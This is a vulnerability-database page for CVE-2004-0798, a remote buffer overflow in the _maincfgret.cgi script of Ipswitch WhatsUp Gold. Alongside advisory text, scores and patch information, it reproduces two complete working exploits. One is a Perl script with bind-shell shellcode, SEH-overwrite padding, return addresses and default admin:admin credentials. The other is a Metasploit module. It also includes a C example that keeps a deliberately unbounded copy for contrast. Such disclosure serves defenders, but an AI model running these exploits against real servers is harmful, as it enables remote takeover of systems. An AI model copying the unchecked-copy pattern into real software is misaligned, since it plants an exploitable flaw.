CVE-2004-0798
CVSS 7.5
Published: 2004-10-20 00:00:00
Revised: 2008-09-05 16:39:25

[Original] Buffer overflow in the _maincfgret.cgi script for Ipswitch WhatsUp Gold before 8.03 Hotfix 1 allows remote attackers to execute arbitrary code via a long instancename parameter.


[CNNVD] Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability (CNNVD-200410-069)

        
        Ipswitch WhatsUp Gold is a Windows-based network monitoring application.
        WhatsUp Gold contains a buffer overflow when handling user requests carrying malformed parameters; a remote attacker can exploit it to take control of the server.
        The _maincfgret.cgi program in WhatsUp Gold does not properly check or filter the user-supplied instancename parameter. A remote attacker can POST an over-long value, overflow the buffer and execute arbitrary instructions.
        The issue is fixed in 8.03 Hotfix 1, and the WhatsUp Gold web server that exposes the CGI is not enabled by default (see the iDefense advisory reproduced below).
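The defect class described above, an unbounded copy of a CGI form parameter into a fixed-size buffer, next to the bounded form that rejects over-long input. This is an added example, not Ipswitch's code and not taken from the advisory or the exploits on this page. The buffer size FIELD_MAX, the form-body parser and every function name are assumptions for illustration; the page only establishes that the instancename value of a POST to _maincfgret.cgi is copied without a length check and that the public exploits reach the SEH record with 811 bytes of padding. The request bodies fed to it are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the stack buffer that receives the parameter. The
 * real size inside WhatsUp Gold is not given on this page. */
#define FIELD_MAX 64

/* Locate the value of `name` in an application/x-www-form-urlencoded body
 * such as "page=notify&type=Beeper&instancename=Beeper1&end=end".
 * Returns a pointer to the value and stores its length in *len (the value
 * is not NUL-terminated inside the body); returns NULL if absent. */
const char *find_param(const char *body, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');          /* skip to the next key=value pair */
        if (p) p++;
    }
    return NULL;
}

/* VULNERABLE shape: copies as many bytes as the client sent. A value longer
 * than FIELD_MAX runs past `field` into the saved frame and, on Windows,
 * the SEH record that the exploits on this page overwrite. Kept only for
 * contrast; never feed it untrusted input (the test calls it with a short
 * value only). */
int handle_instancename_vulnerable(const char *body)
{
    char field[FIELD_MAX];
    size_t len;
    const char *v = find_param(body, "instancename", &len);
    if (!v) return -1;
    memcpy(field, v, len);           /* no bounds check on len */
    field[len] = '\0';
    return (int)strlen(field);
}

/* HARDENED shape: compare the length against the destination before the
 * copy and reject over-long input outright instead of silently truncating. */
int handle_instancename_hardened(const char *body)
{
    char field[FIELD_MAX];
    size_t len;
    const char *v = find_param(body, "instancename", &len);
    if (!v) return -1;                       /* parameter missing */
    if (len >= sizeof field) return -2;      /* would overflow: reject */
    memcpy(field, v, len);
    field[len] = '\0';
    return (int)strlen(field);
}

/* Constructed body whose instancename value is n bytes of 'A', mirroring the
 * padding the public exploits send, run through the hardened handler.
 * Returns the handler's result: the value length when it fits, -2 otherwise. */
int hardened_result_for_padding(size_t n)
{
    static char body[8192];
    const char *prefix = "page=notify&origname=&action=return&type=Beeper&instancename=";
    const char *suffix = "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
    size_t plen = strlen(prefix), slen = strlen(suffix);
    if (plen + n + slen + 1 > sizeof body) return -99;   /* too big for the demo buffer */
    memcpy(body, prefix, plen);
    memset(body + plen, 'A', n);
    memcpy(body + plen + n, suffix, slen + 1);           /* copies the NUL too */
    return handle_instancename_hardened(body);
}

int main(void)
{
    printf("short value : %d\n", handle_instancename_hardened("type=Beeper&instancename=Beeper1&end=end"));
    printf("811 x 'A'   : %d\n", hardened_result_for_padding(811));
    printf("4080 x 'A'  : %d\n", hardened_result_for_padding(4080));
    return 0;
}
```

The hardened handler returns an error rather than truncating because a silently shortened instance name would be stored under a different key than the one the user submitted; refusing the request is the behaviour a CGI should have for a field that has a fixed maximum.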

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [degraded performance or interrupted access to resources]
Access complexity: LOW [no special access conditions for exploitation]
Access vector: [--]
Authentication: NONE [no authentication required] (caveat: both public exploits reproduced below send an HTTP Basic Authorization header, admin:admin in the Perl exploit and by default in the Metasploit module, and the module's fingerprint comment shows the server answering 401 with realm "WhatsUp Gold")

- CPE (affected platforms and products)

cpe:/a:ipswitch:whatsup_gold:8.01  Ipswitch WhatsUp Gold 8.01
cpe:/a:ipswitch:whatsup_gold:7.0   Ipswitch WhatsUp Gold 7.0
cpe:/a:ipswitch:whatsup_gold:8.03  Ipswitch WhatsUp Gold 8.03
cpe:/a:ipswitch:whatsup_gold:8.0   Ipswitch WhatsUp Gold 8.0
cpe:/a:ipswitch:whatsup_gold:7.03  Ipswitch WhatsUp Gold 7.03
cpe:/a:ipswitch:whatsup_gold:7.04  Ipswitch WhatsUp Gold 7.04

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0798
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0798
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-069
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/17111
(VENDOR_ADVISORY)  XF  whatsup-maincfgret-bo(17111)
http://www.ipswitch.com/Support/WhatsUp/patch-upgrades.html
(UNKNOWN)  MISC  http://www.ipswitch.com/Support/WhatsUp/patch-upgrades.html
http://www.idefense.com/application/poi/display?type=vulnerabilities
(UNKNOWN)  IDEFENSE  20040825 Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/11043
(UNKNOWN)  BID  11043

- Vulnerability information

Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-10-20 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Vendor patch:
        Ipswitch
        --------
        The vendor has released an upgrade (8.03 Hotfix 1, per the iDefense advisory reproduced below) to fix this issue; download it from the vendor's home page:
        
        http://www.ipswitch.com/

- Vulnerability information (566)

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit (EDBID:566)
Platform: windows  Type: remote
Date: 2004-10-04  Verified
Port: 80  Author: LoWNOISE
N/A
#!/usr/bin/perl 
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia 
# et(at)cyberspace.org
# Oct/2004
# 
# Tested on WIN2K SP4 
#
# The exploit takes control by overwriting the pointer of a Structured
# Exception Handler, installed by WhatsUP and points to a routine that
# handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an
# exception that can be manipulated by changing the SEH pointer (ret [815]).
# 
#
# Bug Discovered by 
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,
# Ritt3r,Mav, f4lc0n.. 

use strict; 
use IO::Socket::INET;

usage() unless (@ARGV == 2); 

my $host = shift(@ARGV); 
my $port = shift(@ARGV); 

# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". 
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". 
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". 
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". 
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". 
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". 
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". 
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". 
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". 
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". 
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". 
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". 
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". 
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". 
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". 
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". 
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". 
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". 
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". 
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". 
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; 

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port); 
$socket or die "Cannot connect to the host.\n"; 

$socket->autoflush(1); 

print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; 
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; 
print $socket "Referer: http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; 
print $socket "Accept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";


#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]

$cmd .= "A"x811; #815 -4 
$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode


#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll

#$cmd .= "LOWNOISE"; #garbage :D 
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); # more filler

$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
# YWRtaW46YWRtaW4= is base64 for "admin:admin"; the CGI sits behind HTTP Basic auth
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";

close($socket); 
exit(0); 

sub usage 
{ 
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n"; 
print "[host] Target host\n[port] WhatsUp webserver port\n\n"; 
print "\n Shell on tcp port 28876.\n\n"; 
print "ET LoWNOISE 2004\n";
exit(1); 
}


# milw0rm.com [2004-10-04]
		

- Vulnerability information (16787)

Ipswitch WhatsUp Gold 8.03 Buffer Overflow (EDBID:16787)
Platform: windows  Type: remote
Date: 2010-07-14  Verified
Port: 0  Author: metasploit
N/A
##
# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
	HttpFingerprint = { :pattern => [ /WhatsUp/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
				posting a long string for the value of 'instancename' in the _maincfgret.cgi
				script an attacker can overflow a buffer and execute arbitrary code on the system.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9820 $',
			'References'     =>
				[
					['CVE', '2004-0798'],
					['OSVDB', '9177'],
					['BID', '11043'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 25 2004'))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
				OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']),
			], self.class )
	end

	def exploit
		c = connect

		num = rand(65535).to_s
		user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"

		req   = "page=notify&origname=&action=return&type=Beeper&instancename="
		req  << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"

		print_status("Trying target %s..." % target.name)
		res = send_request_cgi({
			'uri'          => '/_maincfgret.cgi',
			'method'       => 'POST',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => req,
			'headers'      =>
			{
				'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
			}
		}, 5)

		handler
	end

end
		

- Vulnerability information (F83076)

Ipswitch WhatsUp Gold 8.03 Buffer Overflow (PacketStormID:F83076)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary,cgi
CVE-2004-0798

This Metasploit module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system.

    

- Vulnerability information (F34168)

iDEFENSE Security Advisory 2004-08-25.t (PacketStormID:F34168)
2004-08-26 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,overflow,arbitrary,cgi
CVE-2004-0798

iDEFENSE Security Advisory 08.25.04 - Remote exploitation of a buffer overflow vulnerability in Ipswitch Inc.'s WhatsUp Gold allows attackers to execute arbitrary code under the privileges of the user that instantiated the application. The problem specifically exists in the _maincfgret.cgi script accessible through the web server installed by WhatsUp Gold. By posting a long string for the value of 'instancename', a buffer overflow occurs allowing an attacker to redirect the flow of control and eventually execute arbitrary code. Fixed in version 8.03 Hotfix 1.

Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability

iDEFENSE Security Advisory 08.25.04
http://www.idefense.com/application/poi/display?type=vulnerabilities
August 25, 2004

I. BACKGROUND

Ipswitch WhatsUp Gold is a Microsoft Windows based network monitoring
application. More information is available at:

    http://www.Ipswitch.com/products/whatsup/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Ipswitch
Inc.'s WhatsUp Gold allows attackers to execute arbitrary code under the
privileges of the user that instantiated the application.

The problem specifically exists in the _maincfgret.cgi script accessible
through the web server installed by WhatsUp Gold. By posting a long
string for the value of 'instancename', a buffer overflow occurs
allowing an attacker to redirect the flow of control and eventually
execute arbitrary code.

III. ANALYSIS

Successful exploitation allows remote attackers to execute arbitrary
code under the privileges of the user that instantiated the application.
The WhatsUp Gold web server is not enabled by default.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability against
WhatsUp Gold version 8.03. iDEFENSE has confirmed that the latest
version of WhatsUp Gold, version 8.03 Hotfix 1, is not vulnerable.

V. WORKAROUND

Disable the WhatsUp Gold web server if it is not required.

VI. VENDOR RESPONSE

The buffer overflow is repaired in WhatsUp Gold, version 8.03 Hotfix 1.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0798 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/12/2004   Initial vendor notification
08/12/2004   iDEFENSE clients notified
08/12/2004   Initial vendor response
08/25/2004   Public disclosure

IX. CREDIT

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
    

- Vulnerability information

OSVDB 9177
Ipswitch WhatsUp Gold _maincfgret.cgi Remote Overflow
Location: Remote / Network Access  Attack type: Input Manipulation
Impact: Loss of Integrity  Solution: Upgrade
Exploit: Public, Commercial

- Vulnerability description

A remote overflow exists in WhatsUp Gold. The _maincfgret.cgi script fails to properly bounds check the instancename variable resulting in a buffer overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.

- Timeline

Disclosure: 2004-08-25  Vendor notified: 2004-08-12 (matches the iDefense timeline above)
Exploit published: 2004-10-03  Solution: Unknown

- Solution

Upgrade to version 8.03 Hotfix 1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable the web interface

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error  BID: 11043
Remote: Yes  Local: No
Published: 2004-08-25 12:00:00  Updated: 2008-02-01 07:07:00
The individual responsible for discovery of this issue is currently unknown.

- Vulnerable versions

Ipswitch WhatsUp Gold 8.03
Ipswitch WhatsUp Gold 8.01
Ipswitch WhatsUp Gold 8.0
Ipswitch WhatsUp Gold 7.04
Ipswitch WhatsUp Gold 7.03
Ipswitch WhatsUp Gold 7.0

- Not vulnerable

Ipswitch WhatsUp Gold 8.03 Hotfix 1

- Discussion

Ipswitch WhatsUp Gold is affected by a remote buffer-overflow vulnerability because the application fails to properly validate user-supplied string lengths before copying them into static process buffers.

An attacker might leverage this issue to execute arbitrary code on the affected computer with the privileges of the user that started the vulnerable application.

- Exploit

Exploit code is available as a module for the Metasploit Framework (ipswitch_wug_maincfgret.rb, reproduced above under EDB 16787).

- Solution

The vendor has released an upgrade dealing with this issue (8.03 Hotfix 1; see the iDefense advisory above). Fixed releases are listed for:

Ipswitch WhatsUp Gold 7.04
Ipswitch WhatsUp Gold 7.03
Ipswitch WhatsUp Gold 7.0
Ipswitch WhatsUp Gold 8.0
Ipswitch WhatsUp Gold 8.01
Ipswitch WhatsUp Gold 8.03

- References

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.